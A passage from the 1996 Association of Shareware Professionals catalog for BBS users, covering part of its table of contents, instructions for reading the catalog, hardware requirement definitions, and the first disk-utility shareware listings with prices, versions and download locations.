. . 305 + 7.10 Forms generators . . . . . . . . . . . . . 306 + 7.10.1 Forms fillers . . . . . . . . . . . . 307 + 7.10.2 Forms processing . . . . . . . . . . 307 + 7.11 Sales aids . . . . . . . . . . . . . . . . 307 + 7.12 Marketing . . . . . . . . . . . . . . . . 309 + 7.13 Work-at-home . . . . . . . . . . . . . . . 310 + 7.14 Training & support aids . . . . . . . . . 312 + + v + + + + 7.14.1 Lecturing & slide shows . . . . . . . 313 + 7.14.2 "Help desk" applications . . . . . . 314 + 7.15 Simulators & what-ifs . . . . . . . . . . 315 + 7.16 Business utilities . . . . . . . . . . . . 315 + 7.16.1 Weights & measurements . . . . . . . 317 + 7.16.2 File format translators . . . . . . . 319 + 7.17 Software tools & add-ins . . . . . . . . . 319 + 7.17.1 For multiple programs . . . . . . . . 319 + 7.17.2 For other . . . . . . . . . . . . . . 319 + 7.18 Other . . . . . . . . . . . . . . . . . . 320 + + Chapter 8: Finances 322 + 8.1 Stock trading & analysis . . . . . . . . . 322 + 8.2 Personal finances . . . . . . . . . . . . . 325 + 8.2.1 Finances & budgets . . . . . . . . . . 330 + 8.2.2 Checkbook managers . . . . . . . . . . 334 + 8.3 Portfolio management . . . . . . . . . . . 335 + 8.4 Financial calculators . . . . . . . . . . . 338 + 8.5 Income tax preparation . . . . . . . . . . 340 + 8.6 Finance utilities . . . . . . . . . . . . . 341 + + Chapter 9: Engineering 343 + 9.1 Civil engineering . . . . . . . . . . . . . 343 + 9.2 Electrical engineering . . . . . . . . . . 343 + 9.3 Industrial engineering . . . . . . . . . . 345 + 9.4 Mechanical engineering . . . . . . . . . . 345 + 9.5 Structural analysis . . . . . . . . . . . . 347 + 9.6 Surveying & cartography . . . . . . . . . . 347 + 9.7 Engineering utilities . . . . . . . . . . . 348 + 9.7.1 File format translators . . . . . . . 352 + 9.8 Software tools & add-ins . . . . . . . . . 353 + 9.8.1 For multiple programs . . . . . . . . 353 + 9.8.2 For other . . . . . . . . . . . . . . 353 + 9.9 Other . . . . . . . . . . . . . . . . . . . 354 + + Chapter 10: Communications 355 + 10.1 General-purpose modem communications . . . 355 + 10.2 Service-specific programs . . . . . . . . 358 + 10.2.1 For CompuServe . . . . . . . . . . . 358 + 10.2.2 For GEnie . . . . . . . . . . . . . . 359 + 10.2.3 For Internet . . . . . . . . . . . . 360 + 10.3 Bulletin boards . . . . . . . . . . . . . 361 + 10.3.1 Bulletin board utilities . . . . . . 361 + 10.4 Networks . . . . . . . . . . . . . . . . . 362 + 10.4.1 Modem-based networks . . . . . . . . 368 + 10.4.2 Network utilities . . . . . . . . . . 368 + 10.5 Remote computer access . . . . . . . . . . 372 + 10.6 Fax machines & fax cards . . . . . . . . . 372 + 10.7 Voice mail systems . . . . . . . . . . . . 374 + 10.8 Call logging & analysis . . . . . . . . . 374 + 10.8.1 Phone bill analyzers . . . . . . . . 374 + 10.9 File transfer protocols . . . . . . . . . 375 + 10.10 Communication utilities . . . . . . . . . 375 + 10.11 Software tools & add-ins . . . . . . . . 377 + + vi + + + + 10.11.1 For multiple programs . . . . . . . 377 + 10.11.2 For TAPCIS . . . . . . . . . . . . . 377 + 10.11.3 For PCBoard . . . . . . . . . . . . 377 + 10.11.4 For Qmodem . . . . . . . . . . . . . 377 + 10.11.5 For OzCIS . . . . . . . . . . . . . 377 + 10.11.6 For other . . . . . . . . . . . . . 377 + 10.12 Other . . . . . . . . . . . . . . . . . . 378 + + Chapter 11: Mathematics 381 + 11.1 General math . . . . . . . . . . . . . . . 381 + 11.2 Function & curve plotting . . . . . . . . 382 + 11.3 Mathematical utilities . . . . . . . . . . 383 + + Chapter 12: Computer programming 384 + 12.1 CASE tools . . . . . . . . . . . . . . . . 384 + 12.2 Database engines . . . . . . . . . . . . . 385 + 12.3 Languages . . . . . . . . . . . . . . . . 387 + 12.3.1 Assembler . . . . . . . . . . . . . . 388 + 12.3.2 BASIC . . . . . . . . . . . . . . . . 388 + 12.3.2.1 Visual BASIC . . . . . . . . . . 389 + 12.3.3 C . . . . . . . . . . . . . . . . . . 399 + 12.3.3.1 C++ . . . . . . . . . . . . . . 403 + 12.3.4 Pascal . . . . . . . . . . . . . . . 404 + 12.3.4.1 OOP Pascal for DOS (Borland) . . 406 + 12.3.4.2 OOP Pascal for Windows + (Borland) . . . . . . . . . . . 407 + 12.3.5 Other . . . . . . . . . . . . . . . . 407 + 12.4 Hypertext/hypermedia . . . . . . . . . . . 407 + 12.5 Tutorials . . . . . . . . . . . . . . . . 409 + 12.6 Software installation aids . . . . . . . . 410 + 12.7 Software testing aids . . . . . . . . . . 415 + 12.8 Programming utilities . . . . . . . . . . 416 + 12.8.1 Desktop tools for programmers . . . . 417 + 12.8.2 `Help' utilities . . . . . . . . . . 419 + 12.9 Software tools & add-ins . . . . . . . . . 419 + 12.9.1 For multiple programs . . . . . . . . 419 + 12.9.2 For other . . . . . . . . . . . . . . 420 + + Chapter 13: Education 422 + 13.1 Preschool . . . . . . . . . . . . . . . . 422 + 13.2 Elementary . . . . . . . . . . . . . . . . 426 + 13.3 Junior high . . . . . . . . . . . . . . . 437 + 13.4 High school . . . . . . . . . . . . . . . 439 + 13.5 College . . . . . . . . . . . . . . . . . 442 + 13.6 Library/bibliography . . . . . . . . . . . 443 + 13.7 Teachers . . . . . . . . . . . . . . . . . 446 + 13.7.1 Gradebooks . . . . . . . . . . . . . 452 + 13.8 Computers . . . . . . . . . . . . . . . . 454 + 13.8.1 Operating system tutors . . . . . . . 455 + 13.8.2 Typing tutors . . . . . . . . . . . . 457 + 13.8.3 Educational computer games . . . . . 458 + 13.9 Foreign language . . . . . . . . . . . . . 464 + 13.10 Geography . . . . . . . . . . . . . . . . 467 + 13.11 History . . . . . . . . . . . . . . . . . 467 + + vii + + + + 13.12 Literature . . . . . . . . . . . . . . . 470 + 13.13 Math . . . . . . . . . . . . . . . . . . 471 + 13.14 Music . . . . . . . . . . . . . . . . . . 471 + 13.15 Science & ecology . . . . . . . . . . . . 473 + 13.16 Writing . . . . . . . . . . . . . . . . . 474 + 13.17 Software tools & add-ins . . . . . . . . 476 + 13.17.1 For other . . . . . . . . . . . . . 476 + 13.18 Other . . . . . . . . . . . . . . . . . . 476 + + Chapter 14: Graphics 477 + 14.1 Viewing programs . . . . . . . . . . . . . 477 + 14.2 Drawing/editor programs . . . . . . . . . 480 + 14.3 Paint programs . . . . . . . . . . . . . . 485 + 14.3.1 Graphics diversions . . . . . . . . . 487 + 14.4 Presentation graphics . . . . . . . . . . 489 + 14.4.1 Animation applications . . . . . . . 491 + 14.5 CAD/CAM applications . . . . . . . . . . . 492 + 14.5.1 Vector/ray tracing . . . . . . . . . 498 + 14.6 Business applications . . . . . . . . . . 498 + 14.6.1 OCR applications . . . . . . . . . . 500 + 14.6.2 Mapping/cartography . . . . . . . . . 501 + 14.7 Ready-made graphic images . . . . . . . . 502 + 14.7.1 BMP images . . . . . . . . . . . . . 502 + 14.7.2 PCX images . . . . . . . . . . . . . 503 + 14.7.3 WPG images . . . . . . . . . . . . . 503 + 14.7.4 For adults only . . . . . . . . . . . 503 + 14.7.5 Other formats . . . . . . . . . . . . 504 + 14.8 Utilities . . . . . . . . . . . . . . . . 504 + 14.8.1 Cataloging tools . . . . . . . . . . 504 + 14.8.2 Graphic screen capture . . . . . . . 505 + 14.8.3 Graphic print screen . . . . . . . . 507 + 14.8.4 File format translators . . . . . . . 507 + 14.9 Software tools & add-ins . . . . . . . . . 509 + 14.9.1 For multiple programs . . . . . . . . 509 + 14.9.2 For AutoCAD . . . . . . . . . . . . . 509 + + Chapter 15: Home & hobby 510 + 15.1 Arts & crafts . . . . . . . . . . . . . . 510 + 15.2 Astronomy . . . . . . . . . . . . . . . . 510 + 15.3 Computers . . . . . . . . . . . . . . . . 511 + 15.4 Collecting . . . . . . . . . . . . . . . . 512 + 15.5 Fortune telling & astrology . . . . . . . 525 + 15.6 Gambling . . . . . . . . . . . . . . . . . 532 + 15.7 Gardening . . . . . . . . . . . . . . . . 533 + 15.8 Genealogy . . . . . . . . . . . . . . . . 533 + 15.8.1 Pedigrees . . . . . . . . . . . . . . 535 + 15.9 Ham radio . . . . . . . . . . . . . . . . 536 + 15.10 Health . . . . . . . . . . . . . . . . . 537 + 15.10.1 Food/dietary/kitchen . . . . . . . . 537 + 15.10.2 Exercise/fitness . . . . . . . . . . 541 + 15.11 Household automation . . . . . . . . . . 541 + 15.12 How-to projects . . . . . . . . . . . . . 544 + 15.13 Hunting & fishing . . . . . . . . . . . . 544 + 15.14 Lottery . . . . . . . . . . . . . . . . . 546 + + viii + + + + 15.15 Movies & video tapes . . . . . . . . . . 548 + 15.16 Music . . . . . . . . . . . . . . . . . . 549 + 15.17 Personalities . . . . . . . . . . . . . . 554 + 15.17.1 Diaries & journals . . . . . . . . . 555 + 15.18 Photography . . . . . . . . . . . . . . . 557 + 15.19 Planes, trains & automobiles . . . . . . 557 + 15.20 Quotes & anecdotes . . . . . . . . . . . 557 + 15.21 Reading (and writing, too) . . . . . . . 558 + 15.22 Scouting . . . . . . . . . . . . . . . . 558 + 15.23 Self development . . . . . . . . . . . . 563 + 15.24 Sports . . . . . . . . . . . . . . . . . 564 + 15.24.1 Betting pools . . . . . . . . . . . 564 + 15.24.2 Handicapping . . . . . . . . . . . . 564 + 15.24.2.1 For `the ponies' . . . . . . . 564 + 15.24.2.2 For other . . . . . . . . . . . 565 + 15.24.3 Baseball/softball . . . . . . . . . 565 + 15.24.4 Basketball . . . . . . . . . . . . . 568 + 15.24.5 Boating sports . . . . . . . . . . . 569 + 15.24.6 Firearms . . . . . . . . . . . . . . 569 + 15.24.7 Football . . . . . . . . . . . . . . 570 + 15.24.8 Golf . . . . . . . . . . . . . . . . 573 + 15.24.9 Martial arts . . . . . . . . . . . . 574 + 15.24.10 Soccer/rugby . . . . . . . . . . . 574 + 15.24.11 Other . . . . . . . . . . . . . . . 574 + 15.25 Other . . . . . . . . . . . . . . . . . . 575 + + Chapter 16: Religion & philosophy 577 + 16.1 The Bible . . . . . . . . . . . . . . . . 577 + 16.1.1 Bible programs . . . . . . . . . . . 578 + 16.2 For houses of worship . . . . . . . . . . 578 + 16.3 New age/occult . . . . . . . . . . . . . . 579 + 16.4 Philosophy . . . . . . . . . . . . . . . . 581 + 16.4.1 Metaphysics . . . . . . . . . . . . . 581 + 16.5 Software tools & add-ins . . . . . . . . . 582 + 16.5.1 For other . . . . . . . . . . . . . . 582 + 16.6 Other . . . . . . . . . . . . . . . . . . 582 + + Chapter 17: Games 584 + 17.1 Adventure . . . . . . . . . . . . . . . . 584 + 17.2 Arcade games . . . . . . . . . . . . . . . 586 + 17.3 Board games . . . . . . . . . . . . . . . 589 + 17.3.1 Backgammon . . . . . . . . . . . . . 589 + 17.3.2 Mahjong . . . . . . . . . . . . . . . 590 + 17.3.3 Other . . . . . . . . . . . . . . . . 591 + 17.4 Card games . . . . . . . . . . . . . . . . 592 + 17.4.1 Solitaire . . . . . . . . . . . . . . 595 + 17.5 Non-card games . . . . . . . . . . . . . . 598 + 17.5.1 Solitaire . . . . . . . . . . . . . . 598 + 17.6 Casino games . . . . . . . . . . . . . . . 601 + 17.7 Dungeons & Dragons . . . . . . . . . . . . 603 + 17.8 Jokes & humor . . . . . . . . . . . . . . 603 + 17.9 Logic & brain games . . . . . . . . . . . 605 + 17.10 Practical jokes . . . . . . . . . . . . . 609 + 17.11 Puzzles, mix & match . . . . . . . . . . 609 + + ix + + + + 17.12 Sayings & stories . . . . . . . . . . . . 614 + 17.13 Simulators . . . . . . . . . . . . . . . 614 + 17.13.1 Sports . . . . . . . . . . . . . . . 615 + 17.14 Star Trek & Star Wars . . . . . . . . . . 615 + 17.15 Strategy/simulation . . . . . . . . . . . 616 + 17.15.1 War games . . . . . . . . . . . . . 622 + 17.16 Trivia . . . . . . . . . . . . . . . . . 623 + 17.17 Word games . . . . . . . . . . . . . . . 624 + 17.17.1 Crossword puzzles . . . . . . . . . 627 + 17.17.2 Cryptanalysis . . . . . . . . . . . 630 + 17.17.3 Word search . . . . . . . . . . . . 631 + 17.18 Game utilities . . . . . . . . . . . . . 633 + + Chapter 18: About shareware 634 + 18.1 Assn. Shareware Professionals . . . . . . 634 + 18.2 For shareware authors . . . . . . . . . . 638 + 18.3 For shareware disk vendors . . . . . . . . 640 + 18.4 Software tools & add-ins . . . . . . . . . 640 + 18.4.1 For multiple programs . . . . . . . . 640 + + Chapter 19: Other 641 + 19.1 Software tools & add-ins . . . . . . . . . 641 + 19.1.1 For multiple programs . . . . . . . . 641 + 19.2 Other . . . . . . . . . . . . . . . . . . 641 + + + Part 2: Appendixes + + + Appendix A: Author addresses 643 + + Appendix B: Vendor addresses 695 + + Appendix C: Bulletin Boards 708 + + Appendix D: Retired shareware 732 + + Appendix E: Sorted list of all programs 736 + + Appendix F: Supporting Members 757 + + Index 758 + + ASP Catalog for BBS Users (Master Edition) 2 + + + + + + + + ASP Shareware Catalog for BBS Users (Master Edition) + th st + 4 volume, 31 edition + Published August 5, 1996 + + Copyright 1996 by the Association of Shareware Professionals + (ASP), a non-profit organization; all rights reserved. Any + specific hardware/software names used in this catalog are the + (registered) trademarks of specific companies. Individuals, + bulletin board systems, national information systems, non-profit + organizations, and government agencies may freely distribute this + document in electronic form. For-profit disk vendor companies + may distribute this document in electronic form if they have an + ASP associate membership and if they charge only their normal + distribution fees. All others must obtain prior written per- + mission from the Association of Shareware Professionals. Write + to the ASP at 545 Grover Road, Muskegon, MI 49442. + + The programs & services described in this catalog come from + members of the Association of Shareware Professionals. This + catalog may not list every ASP-member product and it may not be + current. Send all comments about the catalog to the above + address, or to CompuServe userID 70007,4004, or as a message in + the CompuServe SHAREWARE forum. + + ASP strives to produce accurate catalogs BUT this publication may + contain any number of typographical, graphical, printing, or + interpretation errors. + + "These programs are produced by members of the Associa- + tion of Shareware Professionals (ASP). ASP wants to + make sure that the shareware principle works for you. + If you are unable to resolve a shareware-related problem + with an ASP member by contacting the member directly, + ASP may be able to help. The ASP Ombudsman can help you + resolve a dispute or problem with an ASP member, but + does not provide technical support for members' + products. Please write to the ASP Ombudsman at 545 + Grover Road, Muskegon, MI 49442 or send a Compuserve + message via Compuserve Mail to ASP Ombuds- + man 70007,3536". The Ombudsman may be contacted by FAX + by sending to the ASP FAX number: (616) 788-2765. In + communication with the Ombudsman please include a tele- + phone number and/or FAX if available. + + Please write to the ASP at the above address if you have any + comments or questions about this catalog. + + ASP Catalog for BBS Users (Master Edition) 3 + + + + + + Chapter 1 + How to read this catalog + + ASP members have supplied product descriptions for each shareware + application they offer. The catalog groups them by subject + matter and lists them alphabetically. If you want to know the + name/address/phone for the author of a particular program, turn + to the index and look for the program by name. You'll usually + see two page references: one describes the page where you read + about the program, the other mentions the page where you can find + information about the author (in Appendix A). Just turn to the + appropriate page and scan for the name of the program. + + The Association of Shareware Professionals does NOT rate members' + software for functionality or usefulness, nor can it attest to + the validity of any product description in this catalog. That is + for you - the user - to decide. Shareware, especially those + products authorized to carry the ASP logo, can be tested on a + "try before you buy" basis. If the software doesn't meet your + needs, you won't have to worry about getting a refund. (That's + the beauty of the shareware marketing concept.) + + + 1.1 Minimum requirements + + Every program description lists its computer and operating system + requirements (e.g. "IBM PC, DOS 2.0 or better"). Unless noted + otherwise, each program assumes you have a standard keyboard, + monitor, printer, and either two floppy drives or a hard disk. + And unless noted otherwise, programs written for the IBM PC + assume you have at least 512k of total installed RAM. Many pro- + grams may also need specific hardware or software such as: + CD-ROM drive + A device capable of reading CD-ROMs. A CD-ROM + looks just like a regular compact disk with music + on it, but it has information on it only a + computer's CD-ROM drive can read. + CGA monitor A video monitor capable of displaying CGA + graphics. This includes most "laptop CGA" + computers, plus higher resolution monitors such as + the EGA or VGA. Some (but not all) of the + described programs may operate correctly with a + Hercules monitor if you use a "CGA simulator" + program; consult your video monitor manual for + details. + Dual 720k disk drives + At least two floppy drives capable of writing at + least 720k of data per disk, or, preferably, a + hard disk (see below). + + ASP Catalog for BBS Users (Master Edition) 4 + + + + EGA monitor A video monitor capable of displaying EGA + graphics. This almost always includes VGA and + other higher-resolution monitors. CGA and + Hercules monitors won't suffice. + EMS memory Memory accessible via the Lotus-Intel-Microsoft + Expanded Memory Specification. Not to be confused + with expanded memory, extended memory, or XMS + memory (see below). Windows, OS/2, and newer + versions of DOS come with software designed to + implement EMS memory on computers with enough + installed memory. + Epson printer + A printer capable of recognizing the Epson print + command set (an industry standard). Some + printers, including some laser printers, have + options to behave like an Epson printer. Some + programs may require a specific model such as the + Epson MX-80 or FX-100. + Hard disk A fixed-, removable-, or network-drive device + capable of storing multiple megabytes of data. + Some programs also assume you have at least one + floppy drive in addition to the hard disk. + Hercules monitor + A video monitor capable of displaying Hercules + graphics. CGA, EGA, VGA, & SVGA monitors won't + suffice. + HP DeskJet A Hewlett-Packard DeskJet or compatible printer. + Some programs may require a DeskJet starting with + a specific model such as the DeskJet Plus or + having a specific feature like a RAM cartridge. + HP LaserJet A Hewlett-Packard LaserJet or compatible printer. + (HP DeskJet printers recognize most, but not all, + of the HP LaserJet command set.) Some programs + may require a specific model such as the LaserJet + II or with a specific feature like the LaserJet + IIIDSi. + Math coprocessor + An IBM PC or compatible computer with an installed + math coprocessor unit. Commonly referred to as an + "80x87 chip," these include the 8087, 80287, and + 80387 coprocessors. (80486- and Pentium-based + computers have math coprocessors by default.) + Most 8086-, 80286-, and 80386-based IBM PCs & + compatibles have no installed math coprocessor by + default. (80286- and 80386-based computers can + accept a math coprocessor if you purchase one.) + Modem A modem. Almost all programs work with a "Hayes + compatible" modem, specifically one able to + recognize the Hayes command set (an industry + standard). A few programs claim to work with non- + Hayes modems too. Some programs may require the + modem to operate at a specific rate of speed (e.g. + "1200 baud"). + Mouse A Logitec- or Microsoft-compatible mouse. + + ASP Catalog for BBS Users (Master Edition) 5 + + + + Network A computer hooked up a local area network (LAN). + Program descriptions will normally specify the + different types of LAN systems under which they + can operate. + Plotter A plotter output device. Many of the described + programs need a plotter able to recognize the HPGL + (Hewlett Packard Graphics Language) command set. + PostScript printer + A printer able to interpret the PostScriptr + command set. Many printers (including the HP + LaserJet series) offer PostScript compatibility + via plug-in cartridges. Software also exists to + emulate PostScript on hundreds of popular + printers. + SVGA monitor + A video monitor capable of displaying SVGA + graphics. This almost always includes higher- + resolution monitors. CGA, EGA, VGA, and Hercules + monitors won't suffice. + Streaming tape device + A device capable of reading streaming tapes. Also + referred to as a "tape backup device." Streaming + tapes look something like a standard music + cassette or videocassette, but it holds + information only a computer can read. Common + streaming tapes include DC600, DC2000, DC2120; + tape storage formats include QIC-40 and QIC-80. + VGA monitor A video monitor capable of displaying VGA + graphics. This almost always includes higher- + resolution monitors. CGA, EGA, and Hercules + monitors won't suffice. + XMS memory Memory accessible via the Lotus-Intel-Microsoft + eXtended Memory Specification. Not to be confused + with expanded memory, extended memory, or EMS + memory (see above). Windows, OS/2, and newer + versions of DOS come with software designed to + implement XMS memory on computers with enough + installed memory. + + + 1.2 Registration benefits + + All ASP member shareware products come with certain minimum + benefits when you register. The author must acknowledge your + registration (you don't just get a canceled check) and must + provide a minimum amount of technical support for at least three + months. + + Many authors provide other registration benefits such as a + printed manual, a master disk, a year of unlimited phone support, + source code, etc. The product description will mention them when + appropriate. + + ASP Catalog for BBS Users (Master Edition) 6 + + + + In addition, every ASP member can offer the following benefits to + registered customers: + + CompuServe + IntroPak obtain an introductory membership to the Compu- + Serve network with a $15 usage credit when you + register an ASP member's shareware product. + + Many authors include this information when they acknowledge + registrations. Contact the author if you need assistance. + + Some authors add "registration reminder screens" to the shareware + version of a program as a way to gently remind people to + register. (The ASP sets ethical standards regarding it.) Almost + all authors will either send a copy of the program without + reminder screens, or will disclose a method to disable the + reminders, once you register the product. + + + 1.3 Sample product description + + This sample description will help you understand what each field + means: + + Product: Shareware Program Name [***] + A "[***]" across from the product name indicates a new or + updated description since the last catalog. + Author: name & phone number of the person or company offering + this product. See Appendix A for detailed information about + the person or company. + Version: version number (release date) + Needs: computer type [IBM PC, IBM 80386, Macintosh, etc.], + operating system, and version number. May also describe other + needed or recommended hardware & software. See above for more + details. + Registration fee: The cost of a single user license, expressed + in U.S. currency unless otherwise noted. Many authors provide + "multi-tier" registrations, and you may pay a little more or + less than the amount stated here depending on your situation. + (You can often save money by "reading the fine print.") Some + authors include shipping & handling fees in the prices while + others don't. Most authors offer network, site, and corporate + licenses for a higher fee; please contact the author in + question for details and price quotes. + SWREG#: applies only to CompuServe users. You can register this + product on CompuServe and have the cost added to your service + bill. This method of payment proves especially useful for (1) + overseas users who don't have a credit card accepted by the + author; and (2) business customers who find it easier to + register shareware by tacking the fee onto a corporate- + + ASP Catalog for BBS Users (Master Edition) 7 + + + + sponsored CompuServe account. CompuServe users should GO + CIS:SWREG for more details. + PsL#: you can register this product via the Public (software) + Library, and you can pay for it with your MasterCard, Visa, + American Express, Optima, or Discover card. Call (800) + 242-4775, have your credit card handy, and have the product's + PsL registration number handy. (Overseas customers should call + U.S. 713-524-6394.) Or if you want to fax your shareware + purchase order to PsL, fax it to (713) 524-6398. + Registration benefits: Describes the benefits you get for regis- + tering the software. All ASP shareware programs come with cer- + tain minimum benefits (see above for details). + Look for: FILENAME.EXT on BBSs (call xxx-xxx-xxxx to download it + at no charge); FNAME.EXT in GATE:FORUM forum LIB 9 on Compu- + Serve (or contact userID 78901,2345 for assistance); FILE- + NAME.EXT in ROUNDTABLE RTC LIB 9 on GEnie (or contact userID + J.QAUTHOR for assistance). + Download size: the size of the file(s) to download, in + kilobytes. A 2400 baud modem can download about 14 kilobytes + per minute under normal conditions. + Special instructions: tells if the author limits product + distribution to the United States. In some cases the author or + company may have signed a contract forbidding worldwide share- + ware distribution. In other cases the product may only appeal + to an American audience (income tax software for example). In + rare cases, U.S. federal laws may actually prohibit the author + or company from distributing the product in other countries. + Editor's note: the catalog editor may append text of his own if + something needs further explanation. + Description: a paragraph or two of text which describes the + shareware product in detail. This information comes direct + from the author or company behind the program. + + Chapter 1, "Shareware Products" 8 + + + + + + + + + + + + + + + + + + + + PART 1 + Shareware Products + + Chapter 2, "Utilities" 9 + + + + + + Chapter 2 + Utilities + + + 2.1 Disk utilities + + Product: 4DOS + Replacement for traditional command processor. See full + description on page 91. + + Product: 4DOS for Windows NT + Replacement for Windows NT command processor. See full + description on page 91. + + Product: 4OS2 + Replacement for OS/2 command processor. See full description + on page 92. + + Product: Easy Install + Creates instant distribution disks. See full description on + page 411. + + Product: Easy SFX + Creates self extracting installation files. See full + description on page 411. + + Product: Flu_Shot+ + Virus detection/prevention via active monitor. See full + description on page 161. + + Product: HiVIDEO + DOS memory expander for VGA/EGA systems. See full description + on page 59. + + Product: MicroFox DOS Utilities + DOS Utilities for Printers, screens, files. See full + description on page 27. + + Product: No*STOP SUPRDUPE + Author: NONSTOP NETWORKS LIMITED, 212-481-8488 + Version: 3.1 (06-16-95) + Needs: IBM PC, DOS 3.1 or better. 156k RAM; Hard disk. + Registration fee: $35.00 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, CompuServe, mail + support; 1-month return policy; all ASP-wide offers (see + + Chapter 2, "Utilities" 10 + + + + page 6); discounts on other products. Lifetime free upgrading + allowed. + Look for: availability unknown on BBSs; SUPRDUPE.ZIP on + CompuServe in CIS:ASPFORUM forum LIBrary 0 (or contact userID + 76557,3724 for assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Makes two drives the same. It "synchronizes" them. Any two + drives, so long as the "target" is large enough to hold the + data on the "source". Make a floppy look like a subdirectory of + your hard disk. Make your RAMdrive look like a subdirectory of + your hard disk. Scrub a complex data structure (such as a demo) + from your hard disk. Dump important structures and data to a + removable device for backup and safekeeping. Copies only if + date/time, attributes or size different. Deletes junk on + target. + + + Product: NoiseKiller + Author: Jean-Pierre Menicucci, +33-9959-1228 + Version: V1.2 (02-01-96) + Needs: IBM AT (80286), Windows 3.1 or better. 98k RAM; EGA + monitor; Hard disk. + Registration fee: $20.00 + Registration benefits: 31/2" master disk(s); lifetime unlimited + fax, BBS, CompuServe, mail support. + Look for: availability unknown on BBSs; NKU3.ZIP on CompuServe in + CIS:PCHW forum LIBrary 2 (or contact userID 73261,2701 for + assistance). + SWREG#: 6218 + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + Disk utility. Spins IDE drives down when unused. Drives start + spinning again as soon as accessed. + + + Product: Snooper + Fast, friendly, powerful system info utility. See full + description on page 103. + + Product: STEENBURGH's STUFF + 23 batch utilities, input, output, etc. See full description + on page 99. + + 2.1.1 Disk cataloging + + Product: Disk Piecharter + Graphical File Manager extension. See full description on + page 12. + + Product: Disk Piecharter + Graphical disk explorer. See full description on page 12. + + Chapter 2, "Utilities" 11 + + + + Product: DISKLIST + Diskette cover & label producer - 39 formats. See full + description on page 19. + + Product: DizView + View FILE_ID.DIZ files in all your ZIPs. See full description + on page 26. + + Product: File Finder/Grouper + The best file finder! Find & process files. See full + description on page 26. + + Product: The MetaKit Library [***] + C++ classes for persistent structured data. See full + description on page 387. + + Product: ViDir/ViRes File Monitor System + Author: Vahnzinn international, 215-643-6901 + Version: 1.02 (02-28-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM. Memory-resident + portion: 8k-72k RAM depending on options. + Strongly recommended: Hard disk. + Registration fee: $39.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, CompuServe, + mail support; discounts on upgrades. + Look for: VIDIR*.ZIP on BBSs (call 718-837-3236 to download it at + no charge); VIDIR.ZIP on CompuServe in CIS:PCUTIL forum LIBrary + 6 (or contact userID 70353,151 for assistance). + SWREG#: 2564 + PsL#: 11232 + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + Determines what files you never use, backs them up, and then + deletes them, helping you save up to 80% of your disk space + without deleting the programs or data files you use. It's like + connecting additional disk drives to your system without the + expense! Also helps you determine: which, of all your files, + are used the most, so you can move them to a RAM disk, and + which word processor or spreadsheet files you need to take with + you on a trip or to print your documents on another PC. + + + Product: Wilbur [***] + index, search and view your file contents. See full + description on page 53. + + 2.1.2 Hard disk utilities + + Product: Bootit + Multi-boot/user defined HD specs. See full description on + page 90. + + Chapter 2, "Utilities" 12 + + + + Product: DaMenu + A premier point & shoot DOS menu. See full description on + page 149. + + Product: DATA PROTECTOR + Protect your data against anauthorized access. See full + description on page 164. + + Product: Disk Piecharter + Author: Zorn Software (Hans Zorn) + Version: 1.1 (03-08-95) + Needs: IBM PC, Windows 3.0 or better. 4096k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $15.00 + Registration benefits: 3 months of fax, CompuServe, mail support; + all ASP-wide offers (see page 6). + Look for: DSKPIE11.ZIP on BBSs; DSKPIE.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 8 (or contact userID 73134,2177 for + assistance). + SWREG#: 3976 + PsL#: 11746 + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + Windows Filemanager extension that graphically shows disk usage + per directory and per file. Zoom in and out on piechart + segments. Enables you to delete whole directory trees (if + desired) and shows the effect on free disk space. Seemless + integration with Filemanager. Once installed you'll never want + to be without it. + + + Product: Disk Piecharter + Author: Zorn Software (Hans Zorn) + Version: 2.0 (02-24-96) + Needs: IBM 80386, Windows 95 or better. 4096k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $15.00 + Registration benefits: 3 months of fax, CompuServe, mail support; + all ASP-wide offers (see page 6). + Look for: DSKPIE20.ZIP on BBSs; DSKPIE20.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 8 (or contact userID 73134,2177 for + assistance). + SWREG#: 9118 + PsL#: 11746 + Download size: 75k (about six minutes with a 2400 baud modem) + Description: + Graphical disk explorer that shows disk usage per directory and + per file. Zoom in and out on piechart segments. Enables you to + delete whole directory trees (if desired) and shows the effect + on free disk space. + + Chapter 2, "Utilities" 13 + + + + Product: Drag And Zip + Drag and Drop shell for PKZIP/UNZIP. See full description on + page 36. + + Product: DRIV_MAN + Author: MicroMetric (David Groome), 813-377-2515 + Version: 1.30 (10-31-94) + Needs: IBM PC, DOS 3.0 or better. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. + Look for: DMAN130.ZIP on BBSs (call 813-371-2490 to download it + at no charge); DRIMAN.ZIP on CompuServe in CIS:IBM forum + LIBrary 0 (or contact userID 71631,744 for assistance). + Download size: 82k (about six minutes with a 2400 baud modem) + Description: + A disk utility management tool that displays pertinent logical + drive data - up to 26 drives on a single screen for analysis/ + storage. Display includes: drive data summary with cap. used + free for each avail/selected drive, drive data graph with the + same data, total disk summary and graph, and individual drive + data displaying data on one drive at a time. Options include: + selectable/editable drive range, disk storage of the disk drive + summary display, auto run, ++. + + + Product: EDDY (EDit DirectorY) + Author: John Scofield + Version: 8c (05-12-96) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: EGA monitor; Hard disk. + Registration fee: $29.95 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support. 3-month return policy. + Lifetime free upgrading allowed. + Look for: EDDY8C3.ZIP on BBSs (call 415-323-4389 to download it + at no charge); EDDY.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 6 (or contact userID 70162,2357 